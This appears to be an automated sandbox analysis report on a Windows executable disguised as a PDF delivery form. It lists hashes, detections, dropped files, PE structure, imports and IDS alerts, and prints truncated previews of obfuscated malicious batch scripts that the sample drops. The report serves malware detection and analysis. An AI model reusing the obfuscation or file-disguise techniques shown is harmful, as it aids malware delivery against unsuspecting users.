SSDEEP:	24576:TS1gzTBokW3THfYl7JTOs1r7FX2DOfqDrKfK8r/4mSwhODqR:TtTiq973f
MD5:	72AB2A99902EC6F67B0D4DF67820328E
SHA1:	31477040C90AAB506547FE4E4450E71B76E9345B
SHA-256:	406044BA7E007830321B3669505774B9E282502AC958F0CD723E5106C33C4180
SHA-512:	3FF78C68E71F0BC2788F4177D7A49FF5857A71EC42D5E70C786F9CDEA3A4B8ED1563FE95BEEF7501C8B6C85E96E06B63F5E5399575163B50BB6404BDEC025CCE
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 58%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B............................,.............@..........................P...................@...........................p......@..........................H\|...................................................w...............................text............................... ..`.itext..t........................... ..`.data...............................@....bss.....7...0...........................idata...*...p...,..................@....tls....4............@...................rdata...............@..............@..@.reloc..H\|.......~...B..............@..B.rsrc........@......................@..@.............P......................@..@................................................................................................

C:\Users\Public\Libraries\FX.cmd

Download File

Process:	C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe
File Type:	DOS batch file, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	8556
Entropy (8bit):	4.623706637784657
Encrypted:	false
SSDEEP:	192:dSSQx41VVrTlS2owuuWTtkY16Wdhdsu0mYKDCIfYaYuX1fcDuy:Vrhgwuua5vdnQaCIVJF6uy
MD5:	60CD0BE570DECD49E4798554639A05AE
SHA1:	BD7BED69D9AB9A20B5263D74921C453F38477BCB
SHA-256:	CA6A6C849496453990BECEEF8C192D90908C0C615FA0A1D01BCD464BAD6966A5
SHA-512:	AB3DBDB4ED95A0CB4072B23DD241149F48ECFF8A69F16D81648E825D9D81A55954E5DD9BC46D3D7408421DF30C901B9AD1385D1E70793FA8D715C86C9E800C57
Malicious:	true
Preview:	@echo off..set "MJtc=Iet "..@%.r.......%e%...%c%...r....%h%.....%o%........% % .....%o%...%f%.o.%f%......%..s%.......%e%.%t%.. .....% %.rr.. .%"%...%w%......%o%...o..%t%r.....%c%....%=%... . .%s%...... %e%....%t%....% %........ %"% o...%..%wotc%"%.%n% r .%O%...%P%.. ..%t%.%=%...... o..%=%......%"%....r...%..%wotc%"aeeYdDdanR%nOPt%s://"..%wotc%"%..........%a%.%e%......%e%.r..%Y%..%d%.....r....%D%.. %d% ... .%a%.. ...%n%.. ..%R%........%%nOPt%s%...... .%:%.. %/%....%/%r......%"%.....r.%..%wotc%"%...... ...%U%.o..%g%.r.%

C:\Users\Public\Libraries\NEO.cmd

Download File

Process:	C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe
File Type:	DOS batch file, Unicode text, UTF-8 text, with very long lines (420), with CRLF line terminators
Category:	dropped
Size (bytes):	46543
Entropy (8bit):	4.705001079878445
Encrypted:	false
SSDEEP:	768:Ud6T6yIssKMyD/LgZ0+9Z2noufIBUEADZQp2H8ZLq:UdQFIssKMyjL4X2T8UbZT
MD5:	637A66953F03B084808934ED7DF7192F
SHA1:	D3AE40DFF4894972A141A631900BD3BB8C441696
SHA-256:	41E1F89A5F96F94C2C021FBC08EA1A10EA30DAEA62492F46A7F763385F95EC20
SHA-512:	2A0FEDD85722A2701D57AA751D5ACAA36BBD31778E5D2B51A5A1B21A687B9261F4685FD12E894244EA80B194C76E722B13433AD9B649625D2BC2DB4365991EA3
Malicious:	false
Preview:	@echo off..set "EPD=sPDet "..@%...... or%e%.........%c%......%h%.........o%o%.or......% %.o.ro...%o%.%f%...r.....%f%....r....%..s%. %e%.....%t% % % rrr....%"%.....%E%....%J%.. ....%O%.%h% .......%=%........%s%.. ..%e%....%t%....% %...o...%"%.%..%EJOh%"%.%r% %H%..%C%........%N%....o ....%=%..........%=% .%"%..%..%EJOh%"%.....%K%.%z%..r%j%........%L%..%c%. o.......%f%. o..%x%.%X%.........r%V%.%J%.....%%rHCN%k%.... ...%"%........%..%EJOh%"%.o.....%a%or%g%..o.... ..%u% ..%P%.....o...%X%.. .......%c% .....%U%.%I%. .

C:\Users\Public\Libraries\xnxcxbpC.pif

Download File

Process:	C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	175800
Entropy (8bit):	6.631791793070417
Encrypted:	false
SSDEEP:	3072:qjyOm0e6/bIhbuwxlEb1MpG+xUEyAn0fYuDGOpPXFZ7on+gUxloDMq:qjyl6ebX45OG+xUEWfYUGOpPXFZ7on+G
MD5:	22331ABCC9472CC9DC6F37FAF333AA2C
SHA1:	2A001C30BA79A19CEAF6A09C3567C70311760AA4
SHA-256:	BDFA725EC2A2C8EA5861D9B4C2F608E631A183FCA7916C1E07A28B656CC8EC0C
SHA-512:	C7F5BAAD732424B975A426867D3D8B5424AA830AA172ED0FF0EF630070BF2B4213750E123A36D8C5A741E22D3999CA1D7E77C62D4B77D6295B20A38114B7843C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Joe Sandbox View:	Filename: F.O Pump Istek,Docx.bat, Detection: malicious, Browse Filename: D.G Governor Istek,Docx.exe, Detection: malicious, Browse Filename: qDKTsL1y44.exe, Detection: malicious, Browse Filename: PRODUCT.bat, Detection: malicious, Browse Filename: purchaseorder.bat, Detection: malicious, Browse Filename: PO11550.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, Detection: malicious, Browse Filename: PCMNil7wkU.exe, Detection: malicious, Browse Filename: tTIYCp2sf4.exe, Detection: malicious, Browse Filename: Re_Porforma_Invoice_60_downpayment_-_PT_Era_F1909003_Project_Kupang.exe, Detection: malicious, Browse
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................................................................................................................................................................................................................................................................................PE..L....>.{..................................... ....@.......................... .......c........... ..............................................................H....................................................................................text............................... ..`.data........ ...P..................@....tls.................`..............@....rdata...............b..............@..P.idata... ...........d..............@..@.edata...............\|..8...,...@...@..@

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.343935115196535
TrID:	Win32 Executable (generic) a (10002005/4) 99.38% InstallShield setup (43055/19) 0.43% Windows Screen Saver (13104/52) 0.13% Win16/32 Executable Delphi generic (2074/23) 0.02% Generic Win/DOS Executable (2004/3) 0.02%
File name:	Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe
File size:	1'362'944 bytes
MD5:	72ab2a99902ec6f67b0d4df67820328e
SHA1:	31477040c90aab506547fe4e4450e71b76e9345b
SHA256:	406044ba7e007830321b3669505774b9e282502ac958f0cd723e5106c33c4180
SHA512:	3ff78c68e71f0bc2788f4177d7a49ff5857a71ec42d5e70c786f9cdea3a4b8ed1563fe95beef7501c8b6c85e96e06b63f5e5399575163b50bb6404bdec025cce
SSDEEP:	24576:TS1gzTBokW3THfYl7JTOs1r7FX2DOfqDrKfK8r/4mSwhODqR:TtTiq973f
TLSH:	C555AF17939347B1C4295D7064DE9AB29A14BF20AB74D43A2FD07F4C8F3A94058BBE63
File Content Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	132bc3040b0b0b13

Static PE Info

General

Entrypoint:	0x47082c
Entrypoint Section:	.itext
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
DLL Characteristics:
Time Stamp:	0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	2e10263a01b85d4d1c064ae3be7c8027

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
add esp, FFFFFFF0h
mov eax, 0046F39Ch
call 00007F081D28E3D9h
mov eax, dword ptr [00472C24h]
mov eax, dword ptr [eax]
call 00007F081D2E7B61h
mov ecx, dword ptr [004729F8h]
mov eax, dword ptr [00472C24h]
mov eax, dword ptr [eax]
mov edx, dword ptr [0046CDDCh]
call 00007F081D2E7B61h
mov eax, dword ptr [00472C24h]
mov eax, dword ptr [eax]
call 00007F081D2E7BD5h
call 00007F081D28C0C8h
lea eax, dword ptr [eax+00h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x77000	0x2a88	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x84000	0xd0c00	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x7c000	0x7c48	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x7b000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x777dc	0x69c	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6e60c	0x6e800	7f88a60478da2b59059ac9020a731125	False	0.5148804263291855	data	6.52663869684443	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext	0x70000	0x874	0xa00	1d2f13587195bd07d0eacaf37f6bce18	False	0.53359375	data	5.614686748854788	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x71000	0x1ddc	0x1e00	64398b74c9b81658dc6c1c0840194ed3	False	0.40924479166666666	data	3.912605066546787	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss	0x73000	0x3700	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x77000	0x2a88	0x2c00	e6a0c30232a0c925db3f0b1f9f0c28e7	False	0.3114346590909091	data	5.108538589937939	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x7a000	0x34	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x7b000	0x18	0x200	c82cfd34222b3044514069e79ad6ba11	False	0.05078125	data	0.2044881574398449	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x7c000	0x7c48	0x7e00	2d8e689e68215d8c5822f613430c661e	False	0.6173735119047619	data	6.676175097423695	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc	0x84000	0xd0c00	0xd0c00	b1ad8e7eedbf18149d318d2606d312d2	False	0.5735825224550898	data	7.471427064267704	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0x85334	0x134	Targa image data - Map 64 x 65536 x 1 +32 "\001"	English	United States	0.38636363636363635
RT_CURSOR	0x85468	0x134	data	English	United States	0.4642857142857143
RT_CURSOR	0x8559c	0x134	data	English	United States	0.4805194805194805
RT_CURSOR	0x856d0	0x134	data	English	United States	0.38311688311688313
RT_CURSOR	0x85804	0x134	data	English	United States	0.36038961038961037
RT_CURSOR	0x85938	0x134	data	English	United States	0.4090909090909091
RT_CURSOR	0x85a6c	0x134	Targa image data - RGB 64 x 65536 x 1 +32 "\001"	English	United States	0.4967532467532468
RT_BITMAP	0x85ba0	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.43103448275862066
RT_BITMAP	0x85d70	0x1e4	Device independent bitmap graphic, 36 x 19 x 4, image size 380	English	United States	0.46487603305785125
RT_BITMAP	0x85f54	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.43103448275862066
RT_BITMAP	0x86124	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.39870689655172414
RT_BITMAP	0x862f4	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.4245689655172414
RT_BITMAP	0x864c4	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.5021551724137931
RT_BITMAP	0x86694	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.5064655172413793
RT_BITMAP	0x86864	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.39655172413793105
RT_BITMAP	0x86a34	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.5344827586206896
RT_BITMAP	0x86c04	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.39655172413793105
RT_BITMAP	0x86dd4	0x7dab0	Device independent bitmap graphic, 942 x 182 x 24, image size 514696	English	United States	0.6317840601784216
RT_BITMAP	0x104884	0x128	Device independent bitmap graphic, 21 x 16 x 4, image size 192	English	United States	0.39864864864864863
RT_BITMAP	0x1049ac	0x128	Device independent bitmap graphic, 19 x 16 x 4, image size 192	English	United States	0.3885135135135135
RT_BITMAP	0x104ad4	0x128	Device independent bitmap graphic, 21 x 16 x 4, image size 192	English	United States	0.3885135135135135
RT_BITMAP	0x104bfc	0xe8	Device independent bitmap graphic, 13 x 16 x 4, image size 128	English	United States	0.36637931034482757
RT_BITMAP	0x104ce4	0x128	Device independent bitmap graphic, 17 x 16 x 4, image size 192	English	United States	0.3614864864864865
RT_BITMAP	0x104e0c	0x128	Device independent bitmap graphic, 20 x 16 x 4, image size 192	English	United States	0.3783783783783784
RT_BITMAP	0x104f34	0xd0	Device independent bitmap graphic, 13 x 13 x 4, image size 104	English	United States	0.49038461538461536
RT_BITMAP	0x105004	0x128	Device independent bitmap graphic, 21 x 16 x 4, image size 192	English	United States	0.3716216216216216
RT_BITMAP	0x10512c	0x128	Device independent bitmap graphic, 17 x 16 x 4, image size 192	English	United States	0.2905405405405405
RT_BITMAP	0x105254	0x128	Device independent bitmap graphic, 21 x 16 x 4, image size 192	English	United States	0.38175675675675674
RT_BITMAP	0x10537c	0x128	Device independent bitmap graphic, 19 x 16 x 4, image size 192	English	United States	0.3783783783783784
RT_BITMAP	0x1054a4	0x128	Device independent bitmap graphic, 21 x 16 x 4, image size 192	English	United States	0.3783783783783784
RT_BITMAP	0x1055cc	0xe8	Device independent bitmap graphic, 12 x 16 x 4, image size 128	English	United States	0.3620689655172414
RT_BITMAP	0x1056b4	0x128	Device independent bitmap graphic, 17 x 16 x 4, image size 192	English	United States	0.3581081081081081
RT_BITMAP	0x1057dc	0x128	Device independent bitmap graphic, 20 x 16 x 4, image size 192	English	United States	0.375
RT_BITMAP	0x105904	0xd0	Device independent bitmap graphic, 13 x 13 x 4, image size 104	English	United States	0.47115384615384615
RT_BITMAP	0x1059d4	0x128	Device independent bitmap graphic, 21 x 16 x 4, image size 192	English	United States	0.36824324324324326
RT_BITMAP	0x105afc	0x128	Device independent bitmap graphic, 17 x 16 x 4, image size 192	English	United States	0.28716216216216217
RT_BITMAP	0x105c24	0x128	Device independent bitmap graphic, 21 x 16 x 4, image size 192	English	United States	0.3885135135135135
RT_BITMAP	0x105d4c	0x128	Device independent bitmap graphic, 19 x 16 x 4, image size 192	English	United States	0.375
RT_BITMAP	0x105e74	0x128	Device independent bitmap graphic, 21 x 16 x 4, image size 192	English	United States	0.375
RT_BITMAP	0x105f9c	0xe8	Device independent bitmap graphic, 13 x 16 x 4, image size 128	English	United States	0.36637931034482757
RT_BITMAP	0x106084	0x128	Device independent bitmap graphic, 17 x 16 x 4, image size 192	English	United States	0.35135135135135137
RT_BITMAP	0x1061ac	0x128	Device independent bitmap graphic, 20 x 16 x 4, image size 192	English	United States	0.36486486486486486
RT_BITMAP	0x1062d4	0xd0	Device independent bitmap graphic, 13 x 13 x 4, image size 104	English	United States	0.47115384615384615
RT_BITMAP	0x1063a4	0x128	Device independent bitmap graphic, 21 x 16 x 4, image size 192	English	United States	0.3581081081081081
RT_BITMAP	0x1064cc	0x128	Device independent bitmap graphic, 17 x 16 x 4, image size 192	English	United States	0.28716216216216217
RT_BITMAP	0x1065f4	0xe8	Device independent bitmap graphic, 16 x 16 x 4, image size 128	English	United States	0.4870689655172414
RT_ICON	0x1066dc	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 1889 x 1889 px/m			0.30230496453900707
RT_ICON	0x106b44	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304, resolution 1889 x 1889 px/m			0.1942622950819672
RT_ICON	0x1074cc	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 1889 x 1889 px/m			0.1676829268292683
RT_ICON	0x108574	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 1889 x 1889 px/m			0.11058091286307054
RT_ICON	0x10ab1c	0x178b	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced			0.9465737514518002
RT_DIALOG	0x10c2a8	0x52	data			0.7682926829268293
RT_DIALOG	0x10c2fc	0x52	data			0.7560975609756098
RT_STRING	0x10c350	0x160	data			0.4460227272727273
RT_STRING	0x10c4b0	0x38c	Targa image data - Color 99 x 107 x 32 +68 +111 "z"			0.44162995594713655
RT_STRING	0x10c83c	0x1cc	data			0.558695652173913
RT_STRING	0x10ca08	0xcc	data			0.6764705882352942
RT_STRING	0x10cad4	0x114	data			0.6086956521739131
RT_STRING	0x10cbe8	0x350	data			0.43514150943396224
RT_STRING	0x10cf38	0x3bc	data			0.3817991631799163
RT_STRING	0x10d2f4	0x370	data			0.4022727272727273
RT_STRING	0x10d664	0x3cc	data			0.33539094650205764
RT_STRING	0x10da30	0x214	data			0.49624060150375937
RT_STRING	0x10dc44	0xcc	data			0.6274509803921569
RT_STRING	0x10dd10	0x194	data			0.5643564356435643
RT_STRING	0x10dea4	0x3c4	data			0.3288381742738589
RT_STRING	0x10e268	0x338	data			0.42961165048543687
RT_STRING	0x10e5a0	0x294	data			0.42424242424242425
RT_RCDATA	0x10e834	0x10	data			1.5
RT_RCDATA	0x10e844	0x340	data			0.6899038461538461
RT_RCDATA	0x10eb84	0x35b08	GIF image data, version 89a, 600 x 300	English	United States	0.6346856924588017
RT_RCDATA	0x14468c	0x10463	Delphi compiled form 'TfMain'			0.12409427084114673
RT_GROUP_CURSOR	0x154af0	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.25
RT_GROUP_CURSOR	0x154b04	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.25
RT_GROUP_CURSOR	0x154b18	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x154b2c	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x154b40	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x154b54	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x154b68	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_ICON	0x154b7c	0x4c	data			0.8289473684210527

Imports

DLL	Import
oleaut32.dll	SysFreeString, SysReAllocStringLen, SysAllocStringLen
advapi32.dll	RegQueryValueExA, RegOpenKeyExA, RegCloseKey
user32.dll	GetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
kernel32.dll	GetACP, Sleep, VirtualFree, VirtualAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
kernel32.dll	TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
user32.dll	CreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessageTime, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextExA, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
gdi32.dll	UnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetMapMode, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SetArcDirection, SelectPalette, SelectObject, SelectClipRgn, SaveDC, RoundRect, RestoreDC, Rectangle, RectVisible, RealizePalette, Polyline, PlayEnhMetaFile, Pie, PatBlt, MoveToEx, MaskBlt, LineTo, LPtoDP, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileDescriptionA, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, FrameRgn, FillRgn, ExcludeClipRect, Ellipse, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreateRectRgnIndirect, CreateRectRgn, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateEnhMetaFileA, CreateEllipticRgnIndirect, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, CombineRgn, CloseEnhMetaFile, BitBlt
version.dll	VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
kernel32.dll	lstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualProtectEx, VirtualAlloc, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, QueryDosDeviceA, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalSize, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVolumeInformationA, GetVersionExA, GetVersion, GetUserDefaultLCID, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDriveTypeA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCurrentProcess, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
advapi32.dll	RegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey
oleaut32.dll	GetErrorInfo, SysFreeString
ole32.dll	CreateStreamOnHGlobal, IsAccelerator, OleDraw, OleSetMenuDescriptor, CoCreateInstance, CoGetClassObject, CoUninitialize, CoInitialize, IsEqualGUID
kernel32.dll	Sleep
oleaut32.dll	SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
comctl32.dll	_TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_GetIcon, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-19T07:57:54.994455+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49710	172.217.17.46	443	TCP
2024-12-19T07:57:57.808246+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49712	172.217.17.65	443	TCP

Network Port Distribution
